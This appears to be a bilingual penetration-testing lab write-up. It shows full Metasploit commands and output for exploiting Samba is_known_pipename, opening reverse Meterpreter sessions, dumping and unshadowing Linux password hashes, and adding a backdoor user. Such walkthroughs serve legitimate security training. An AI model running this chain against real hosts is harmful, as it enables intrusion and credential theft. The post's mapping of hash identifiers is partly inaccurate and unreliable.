Dumping Hashes With Hashdump

Posted by r3kind1e on March 17, 2023

Dumping Hashes With Hashdump

We can dump Linux user hashes with the hashdump post exploitation module.

Linux password hashes are stored in the /etc/shadow file and can only be accessed by the root user or a user with root privileges.

The hashdump module can be used to dump the user account hashes from the /etc/shadow file and can also be used to unshadow the hashes for password cracking with John the Ripper.

使用 Hashdump 转储哈希

我们可以使用 hashdump post exploitation 模块转储 Linux 用户哈希。

Linux 密码哈希存储在 /etc/shadow 文件中,只能由 root 用户或具有 root 权限的用户访问。

hashdump 模块可用于从 /etc/shadow 文件中转储用户帐户哈希值,也可用于取消隐藏哈希值以使用 John the Ripper 破解密码。

Demo: Dumping Hashes With Hashdump(演示:使用 Hashdump 转储哈希)

Hashdump is a post exploitation module that is utilized to dump the hashes of both Windows and Linux operating systems. And typically, when you’re utilizing a Meterpreter session on a Windows target, the hashdump command is built right in. However, when we’re utilizing a Meterpreter session on a Linux target, we’ll need to load up the hashdump post exploitation module manually.

But in essence, the only thing you can do with a Linux hash is either crack it or you just store it for later use.

1
2
ifconfig
eth1: 192.101.173.2

Target IP Address: 192.101.173.3

1
2
3
4
5
6
7
8
9
service postgresql start && msfconsole -q
workspace -a hashdump
setg RHOSTS 192.101.173.3
db_nmap -sV 192.101.173.3
search samba type:exploit
use exploit/linux/samba/is_known_pipename
show options
exploit
pwd

Put this in the background, and I will upgrade this session.

1
2
3
sessions
sessions -u 1
sessions 2

If I try and type in hashdump, similar to what we had done on Windows, that’ll tell us unknown command hashdump.

1
meterpreter > hashdump

Given that that is the case, we need to load in the hashdump module, or we need to utilize the post exploitation module called hashdump.

The first thing we want to do is perform some enumeration.

1
meterpreter > sysinfo

Enumerate our current permissions or the user that we currently have access to.

1
meterpreter > getuid

You can see we have the user id of 0, which means we are root.

We can confirm this:

1
2
3
meterpreter > shell
whoami
root

That means we can dump the Linux user account hashes.

Terminate this channel. And then I’ll put our Meterpreter session in the background.

For some reason, that dies.

1
meterpreter > exit

We’re just going to upgrade our previous command shell again.

1
2
3
sessions
sessions -u 1
sessions

Linux Gather Dump Password Hashes for Linux Systems

Post Module to dump the password hashes for all users on a Linux System

Linux 为 Linux 系统收集转储密码哈希

Post 模块转储 Linux 系统上所有用户的密码哈希

1
2
3
4
5
6
search hashdump
use post/linux/gather/hashdump
show options
set SESSION 3
run
loot

We have shadow file. This is where you’ll find the encrypted passwords.

Let’s open up the password file first.

1
cat /root/.msf4/loot/20211127211028_hashdump_192.101.173.3_linux.passwd_734157.txt

This will list out all of the user accounts on the system. We only have the root user and a few other service accounts.

List out the contents of the shadow file.

1
cat /root/.msf4/loot/20211127211028_hashdump_192.101.173.3_linux.shadow_465878.txt

It lists out the user accounts. However, in the place of the password, which is directly after the username is specified, you can see that there’s an asterisk. Which means, in this case, the target system does not have a password specified for any of the user accounts. And that makes sense in some scenarios, especially in the case of the service accounts.

However, just to show you that this indeed does work.

1
sessions 3

Open up a shell session.

1
2
meterpreter > shell
/bin/bash -i

Change the password of the root user, or rather, I will provide the root user with the password.

1
2
3
root@victim-1:/tmp# passwd root
password123
password123

We’ve changed the password for the root user.

And then we can add a few users.

-m: Specify that we want to create a home directory.

And the name of the user will be alexis.

-s: Specify the shell I want the user to use.

1
root@victim-1:/tmp# useradd -m alexis -s /bin/bash

Specify the password for the user alexis.

1
2
3
root@victim-1:/tmp# passwd alexis
password321
password321

Terminate that channel. And again, we’ll need to upgrade our Meterpreter session.

1
sessions -u 1

What we’ve done is we have created a new user, set the password, and change the password for the root user.

Let’s take a look at what happens when we run hashdump now.

1
2
3
show options
set SESSION 4
run

It got the root user hash. And then after the hash, the user id as well as the group id specified, and then the home directory and the shell specified for that user.

1
2
loot
cat /root/.msf4/loot/20211127211028_hashdump_192.101.173.3_linux.hashes_851283.txt

In the case of the unshadowed file, what it does is it just prepares the user accounts and hashes for password cracking. It will get rid of the other information like the user id as well as the group id, and the home diretory as well as the shell session.

What you’ll be left with is going to be the username and then the hash here.

When we talk about this little encapsulated value $6$, that’s been encapsulated in the dollar signs, that is referring to the hashing algorithm or the encryption algorithm that was used to encrypt or hash these passwords. The higher the number, the stronger the hashing algorithm used. If you’re working on an older Linux system, then you’ll find that the value may be 1. And if it is 1, it means that that the password has been hashed with the MD5 hashing algorithm. If it’s 2, it means it’s been hashed with Blowfish. If it’s 3 or 5, that means that it’s been hashed or encrypted with the SHA-256 algorithm. And if it’s 6, it’s utilizing the strongest hashing algorithm, which is SHA-512.

Given that that is the case, if the passwords have been set or if the passwords are created following or in accordance with password security guidelines, then it may be very difficult to crack those passwords or those hashes for that matter. And if they are simple, then, there is a chance that you could crack them. But when it comes down to Linux and hashes, and the functionality of hashes in regards to post exploitation, there’s very little that can be done. Unlike Windows, where we took a look at how to utilize the hashes for legitimate authentication or authenticated command execution. With Linux, we can’t don that. But that’s primarily because once you have root access on a Linux system, you can pretty much do whatever you want. You can create another user, specify a password, and enable SSH so that you can maintain access via SSH.

1
2
sessions 4
meterpreter > 

复现视频内容

1
2
3
4
root@attackdefense:~# ifconfig
eth1: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.153.226.2  netmask 255.255.255.0  broadcast 192.153.226.255
        ether 02:42:c0:99:e2:02  txqueuelen 0  (Ethernet)

Target IP Address: 192.153.226.3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
root@attackdefense:~# service postgresql start && msfconsole -q
[ ok ] Starting PostgreSQL 11 database server: main.
msf5 > workspace -a hashdump
[*] Added workspace: hashdump
[*] Workspace: hashdump
msf5 > setg RHOSTS 192.153.226.3
RHOSTS => 192.153.226.3
msf5 > db_nmap -sV 192.153.226.3
[*] Nmap: Starting Nmap 7.70 ( https://nmap.org ) at 2023-03-17 13:01 UTC
[*] Nmap: Nmap scan report for target-1 (192.153.226.3)
[*] Nmap: Host is up (0.000010s latency).
[*] Nmap: Not shown: 998 closed ports
[*] Nmap: PORT    STATE SERVICE     VERSION
[*] Nmap: 139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
[*] Nmap: MAC Address: 02:42:C0:99:E2:03 (Unknown)
[*] Nmap: Service Info: Host: VICTIM-1
[*] Nmap: Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 11.55 seconds
1
2
3
4
5
6
7
8
msf5 > search samba type:exploit

Matching Modules
================

   #   Name                                                 Disclosure Date  Rank       Check  Description
   -   ----                                                 ---------------  ----       -----  -----------
   3   exploit/linux/samba/is_known_pipename                2017-03-24       excellent  Yes    Samba is_known_pipename() Arbitrary Module Load
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
msf5 > use exploit/linux/samba/is_known_pipename
msf5 exploit(linux/samba/is_known_pipename) > show options

Module options (exploit/linux/samba/is_known_pipename):

   Name            Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOSTS          192.153.226.3    yes       The target address range or CIDR identifier
   RPORT           445              yes       The SMB service port (TCP)
   SMB_FOLDER                       no        The directory to use within the writeable SMB share
   SMB_SHARE_NAME                   no        The name of the SMB share containing a writeable directory


Exploit target:

   Id  Name
   --  ----
   0   Automatic (Interact)


msf5 exploit(linux/samba/is_known_pipename) > exploit

[*] 192.153.226.3:445 - Using location \\192.153.226.3\exploitable\tmp for the path
[*] 192.153.226.3:445 - Retrieving the remote path of the share 'exploitable'
[*] 192.153.226.3:445 - Share 'exploitable' has server-side path '/
[*] 192.153.226.3:445 - Uploaded payload to \\192.153.226.3\exploitable\tmp\DbWGJFwM.so
[*] 192.153.226.3:445 - Loading the payload from server-side path /tmp/DbWGJFwM.so using \\PIPE\/tmp/DbWGJFwM.so...
[-] 192.153.226.3:445 -   >> Failed to load STATUS_OBJECT_NAME_NOT_FOUND
[*] 192.153.226.3:445 - Loading the payload from server-side path /tmp/DbWGJFwM.so using /tmp/DbWGJFwM.so...
[+] 192.153.226.3:445 - Probe response indicates the interactive payload was loaded...
[*] Found shell.
[*] Command shell session 1 opened (192.153.226.2:35051 -> 192.153.226.3:445) at 2023-03-17 13:05:53 +0000

pwd
/tmp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
^Z
Background session 1? [y/N]  y
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.153.226.2:35051 -> 192.153.226.3:445 (192.153.226.3)

msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.153.226.2:4433 
[*] Sending stage (985320 bytes) to 192.153.226.3
[*] Meterpreter session 2 opened (192.153.226.2:4433 -> 192.153.226.3:52802) at 2023-03-17 13:09:08 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > sessions 2
[*] Starting interaction with 2...

meterpreter > 
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
meterpreter > hashdump
[-] Unknown command: hashdump.
meterpreter > sysinfo
Computer     : 192.153.226.3
OS           : Debian 8.11 (Linux 5.4.0-125-generic)
Architecture : x64
BuildTuple   : i486-linux-musl
Meterpreter  : x86/linux
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
meterpreter > shell
Process 45 created.
Channel 1 created.
whoami
root
id
uid=0(root) gid=0(root) groups=0(root)
^C
Terminate channel 1? [y/N]  y
meterpreter > 
[*] 192.153.226.3 - Meterpreter session 2 closed.  Reason: Died
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.153.226.2:35051 -> 192.153.226.3:445 (192.153.226.3)

msf5 exploit(linux/samba/is_known_pipename) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.153.226.2:4433 
[*] Sending stage (985320 bytes) to 192.153.226.3
[*] Meterpreter session 3 opened (192.153.226.2:4433 -> 192.153.226.3:42778) at 2023-03-17 13:14:17 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 exploit(linux/samba/is_known_pipename) > 
[*] Stopping exploit/multi/handler

msf5 exploit(linux/samba/is_known_pipename) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                   Connection
  --  ----  ----                   -----------                                   ----------
  1         shell cmd/unix                                                       192.153.226.2:35051 -> 192.153.226.3:445 (192.153.226.3)
  3         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.153.226.3  192.153.226.2:4433 -> 192.153.226.3:42778 (192.153.226.3)
1
2
3
4
5
6
7
msf5 exploit(linux/samba/is_known_pipename) > search hashdump
Matching Modules
================

   #   Name                                                  Disclosure Date  Rank    Check  Description
   -   ----                                                  ---------------  ----    -----  -----------
   13  post/linux/gather/hashdump                                             normal  No     Linux Gather Dump Password Hashes for Linux Systems
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
msf5 exploit(linux/samba/is_known_pipename) > use post/linux/gather/hashdumpmsf5 post(linux/gather/hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

msf5 post(linux/gather/hashdump) > set SESSION 3
SESSION => 3
msf5 post(linux/gather/hashdump) > run

[+] Unshadowed Password File: /root/.msf4/loot/20230317131814_hashdump_192.153.226.3_linux.hashes_755521.txt
[*] Post module execution completed
msf5 post(linux/gather/hashdump) > loot

Loot
====

host           service  type          name                   content     info                            path
----           -------  ----          ----                   -------     ----                            ----
192.153.226.3           linux.shadow  shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.shadow_750836.txt
192.153.226.3           linux.passwd  passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.passwd_260851.txt
192.153.226.3           linux.hashes  unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.hashes_755521.txt

linux.passwd: Linux Passwd File

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230317131814_hashdump_192.153.226.3_linux.passwd_260851.txt
[*] exec: cat /root/.msf4/loot/20230317131814_hashdump_192.153.226.3_linux.passwd_260851.txt

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false
messagebus:x:104:107::/var/run/dbus:/bin/false
colord:x:105:112:colord colour management daemon,,,:/var/lib/colord:/bin/false
saned:x:106:113::/var/lib/saned:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false

linux.shadow: Linux Password Shadow File

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230317131814_hashdump_192.153.226.3_linux.shadow_750836.txt
[*] exec: cat /root/.msf4/loot/20230317131814_hashdump_192.153.226.3_linux.shadow_750836.txt

root:*:17774:0:99999:7:::
daemon:*:17774:0:99999:7:::
bin:*:17774:0:99999:7:::
sys:*:17774:0:99999:7:::
sync:*:17774:0:99999:7:::
games:*:17774:0:99999:7:::
man:*:17774:0:99999:7:::
lp:*:17774:0:99999:7:::
mail:*:17774:0:99999:7:::
news:*:17774:0:99999:7:::
uucp:*:17774:0:99999:7:::
proxy:*:17774:0:99999:7:::
www-data:*:17774:0:99999:7:::
backup:*:17774:0:99999:7:::
list:*:17774:0:99999:7:::
irc:*:17774:0:99999:7:::
gnats:*:17774:0:99999:7:::
nobody:*:17774:0:99999:7:::
systemd-timesync:*:17774:0:99999:7:::
systemd-network:*:17774:0:99999:7:::
systemd-resolve:*:17774:0:99999:7:::
systemd-bus-proxy:*:17774:0:99999:7:::
messagebus:*:17812:0:99999:7:::
colord:*:17812:0:99999:7:::
saned:*:17812:0:99999:7:::
usbmux:*:17812:0:99999:7:::
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
msf5 post(linux/gather/hashdump) > sessions 3
[*] Starting interaction with 3...

meterpreter > shell
Process 77 created.
Channel 5 created.
/bin/bash -i
bash: cannot set terminal process group (8): Inappropriate ioctl for device
bash: no job control in this shell
root@victim-1:/tmp# passwd root
passwd root
Enter new UNIX password: password123
Retype new UNIX password: password123
passwd: password updated successfully
root@victim-1:/tmp# useradd -m alexis -s /bin/bash
useradd -m alexis -s /bin/bash
root@victim-1:/tmp# passwd alexis
passwd alexis
Enter new UNIX password: password321
Retype new UNIX password: password321
passwd: password updated successfully
root@victim-1:/tmp# ^C
Terminate channel 5? [y/N]  y
meterpreter > 
[*] 192.153.226.3 - Meterpreter session 3 closed.  Reason: Died
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
msf5 post(linux/gather/hashdump) > sessions

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         shell cmd/unix               192.153.226.2:35051 -> 192.153.226.3:445 (192.153.226.3)

msf5 post(linux/gather/hashdump) > sessions -u 1
[*] Executing 'post/multi/manage/shell_to_meterpreter' on session(s): [1]

[*] Upgrading session ID: 1
[*] Starting exploit/multi/handler
[*] Started reverse TCP handler on 192.153.226.2:4433 
[*] Sending stage (985320 bytes) to 192.153.226.3
[*] Meterpreter session 4 opened (192.153.226.2:4433 -> 192.153.226.3:47506) at 2023-03-17 13:34:35 +0000
[*] Command stager progress: 100.00% (773/773 bytes)
msf5 post(linux/gather/hashdump) > 
[*] Stopping exploit/multi/handler

msf5 post(linux/gather/hashdump) > sessions

Active sessions
===============

  Id  Name  Type                   Information                                   Connection
  --  ----  ----                   -----------                                   ----------
  1         shell cmd/unix                                                       192.153.226.2:35051 -> 192.153.226.3:445 (192.153.226.3)
  4         meterpreter x86/linux  uid=0, gid=0, euid=0, egid=0 @ 192.153.226.3  192.153.226.2:4433 -> 192.153.226.3:47506 (192.153.226.3)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
msf5 post(linux/gather/hashdump) > show options

Module options (post/linux/gather/hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION  3                yes       The session to run this module on.

msf5 post(linux/gather/hashdump) > set SESSION 4
SESSION => 4
msf5 post(linux/gather/hashdump) > run

[+] root:$6$eY6fkgwD$IDNcKw91uICNzTu5LwVQZCosxN4iMqc/lRONUywb7ln/YA/6XmfYnYlAPQ84AutqxGoTR3fw038KO8xMpBy.U/:0:0:root:/root:/bin/bash
[+] alexis:$6$R3JXrhz9$QGleQFz9xi66c4Tnl2v2TC2qrbxF74RSJa7dek8M6LX5Sx4gyg7Swhp0CVIVpMQ5vbJ/MAB.b5lgZ1HiH2lbD.:1000:1000::/home/alexis:/bin/bash
[+] Unshadowed Password File: /root/.msf4/loot/20230317133657_hashdump_192.153.226.3_linux.hashes_438803.txt
[*] Post module execution completed
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
msf5 post(linux/gather/hashdump) > loot

Loot
====

host           service  type          name                   content     info                            path
----           -------  ----          ----                   -------     ----                            ----
192.153.226.3           linux.shadow  shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.shadow_750836.txt
192.153.226.3           linux.passwd  passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.passwd_260851.txt
192.153.226.3           linux.hashes  unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20230317131814_hashdump_192.153.22
6.3_linux.hashes_755521.txt
192.153.226.3           linux.shadow  shadow.tx              text/plain  Linux Password Shadow File      /root/.msf4/loot/20230317133657_hashdump_192.153.22
6.3_linux.shadow_096564.txt
192.153.226.3           linux.passwd  passwd.tx              text/plain  Linux Passwd File               /root/.msf4/loot/20230317133657_hashdump_192.153.22
6.3_linux.passwd_409093.txt
192.153.226.3           linux.hashes  unshadowed_passwd.pwd  text/plain  Linux Unshadowed Password File  /root/.msf4/loot/20230317133657_hashdump_192.153.22
6.3_linux.hashes_438803.txt

linux.hashes: unshadowed_passwd.pwd

1
2
3
4
5
msf5 post(linux/gather/hashdump) > cat /root/.msf4/loot/20230317133657_hashdump_192.153.226.3_linux.hashes_438803.txt
[*] exec: cat /root/.msf4/loot/20230317133657_hashdump_192.153.226.3_linux.hashes_438803.txt

root:$6$eY6fkgwD$IDNcKw91uICNzTu5LwVQZCosxN4iMqc/lRONUywb7ln/YA/6XmfYnYlAPQ84AutqxGoTR3fw038KO8xMpBy.U/:0:0:root:/root:/bin/bash
alexis:$6$R3JXrhz9$QGleQFz9xi66c4Tnl2v2TC2qrbxF74RSJa7dek8M6LX5Sx4gyg7Swhp0CVIVpMQ5vbJ/MAB.b5lgZ1HiH2lbD.:1000:1000::/home/alexis:/bin/bash